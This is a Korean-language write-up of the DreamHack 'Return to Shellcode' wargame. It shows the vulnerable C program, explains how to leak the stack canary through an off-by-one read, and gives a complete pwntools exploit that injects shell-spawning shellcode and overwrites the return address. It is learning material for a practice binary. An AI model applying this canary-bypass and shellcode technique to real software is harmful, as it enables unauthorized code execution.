DreamHack - Return to Shellcode 풀이

 

r2s.c

// Name: r2s.c
// Compile: gcc -o r2s r2s.c -zexecstack

#include <stdio.h>
#include <unistd.h>

void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}

int main() {
  char buf[0x50];

  init();

  printf("Address of the buf: %p\n", buf);
  printf("Distance between buf and $rbp: %ld\n",
         (char*)__builtin_frame_address(0) - buf);

  printf("[1] Leak the canary\n");
  printf("Input: ");
  fflush(stdout);

  read(0, buf, 0x100);
  printf("Your input is '%s'\n", buf);

  puts("[2] Overwrite the return address");
  printf("Input: ");
  fflush(stdout);
  gets(buf);

  return 0;
}

 

 

카나리 값 체크

<main+8>에서 실행할 때마다 매번 바뀌는 카나리가 저장된 fs:0x28이 스택 [rbp-0x8]에 저장이 된다. 

QWORD PTR fs:0x28 = QWORD PTR  [rbp-0x8]

 

main 함수 종료 부분에 위치한 <main+249>에는 fs:0x28(카나리)과 스택 [rbp-0x8]을 서로 비교하면서 값이 일치하다면(ZF=1) leave 부분으로 점프를 하게 될 것이고, 일치하지 않다면 스택이 조작된 것을 감지하게 된다. 

 

 

 

파일 보호 기법 확인(checksec)

 

Canary found를 보면 스택 카나리가 활성화가 된 것을 확인. 

NX(No-eXecute)는 비활성화된 것을 보면 쉘코드는 실행 가능하단걸 알 수 있다. 

 

 

카나리 우회 방법

 

Buf + \x00 + canary (7bytes)

1. 0x58+1만큼의 더미값을 입력하여 Canary 값을 공격자가 확인할 수 있게 한다.

(+1을 한 이유는 Canary의 널(\x00)까지 문자를 덮어서 printf %s 출력 시 Canary의 값을 가져오기 위함)

 

2. 사용자 입력 이후에 나오는 값을 p.recvn(7)으로 7 바이트 만큼 읽어 들인다.

(1.)에서 입력 문자가 \x00까지 덮어 씌었기 때문에 앞에 \x00을 덫붙인다. (\x00 + 7 바이트) = 카나리 값

 

3. 두번째에 입력(gets)에는 쉘코드 + 더미값 + 카나리 + SFP + buf 주소를 전달. 

이후에 오버라이팅이 되면서 카나리 값은 변하지 않기 때문에 스택 오버플로우가 감지되지 않는다. 

 

*노트

리틀 엔디언에서는 입력한 값 순서를 반대로 저장을 하고, 출력을 할 때에는 이를 다시 뒤집어 원래 순서대로 가져온다. 

ex)

입력: 0x12 0x34 0x56

저장: 0x56 0x34 0x12

출력: 0x12 0x34 0x56

 

만약 카나리가 0x12345600으로 메모리에 저장이 돼있을 경우 이를 문자열로 출력하게 되면

역순으로 0x00 0x56 0x34 0x12가 나오게 된다. 

 

공격자가 버퍼 오버플로우로 카나리 값을 조작하게 된다면

 

입력: 0X61 ... 0x61

카나리: 0x12345661 

이런식으로 뒤에 부분이 덮어 씌게 된다. 

 

이를 다시 프린트 출력하면

0x61 0x56 0x34 0x12으로 보일 테고 0x61을 제외한 나머지(0x56 0x34 0x12) 앞에다 0x00을 붙이고(0x00563412) 다시 순서를 뒤집으면 카나리 값을 구할 수 있게 된다. 

>> 0x12345600

 

 

 

exploit.py

from pwn import *

context.arch = "amd64"
# p = remote("host3.dreamhack.games", 20875)
p = process("./r2s")

p.recvuntil("Address of the buf: ")
addr_of_buf = int(p.recvn(14), 16)

p.recvuntil("$rbp: ")
rbp = int(p.recvn(2))

payload = b'a' * (rbp-8+1)
p.sendafter("Input: ", payload)
p.recvuntil(payload)
canary = u64(b"\x00" + p.recvn(7))

shellcode = asm(shellcraft.sh())
payload = shellcode
payload += b'b' *  ( 88 - len(shellcode) )
payload += p64(canary)
payload += b'c' * 8
payload += p64(addr_of_buf)

p.sendlineafter("Input: ", payload)

p.interactive()

 

 

참고: 

https://thfist-1071.tistory.com/entry/Dreamhack-Wargame-Canary%EC%99%80-Return-to-Shellcode-Write-up

[Dreamhack Wargame] Canary와 Return to Shellcode Write up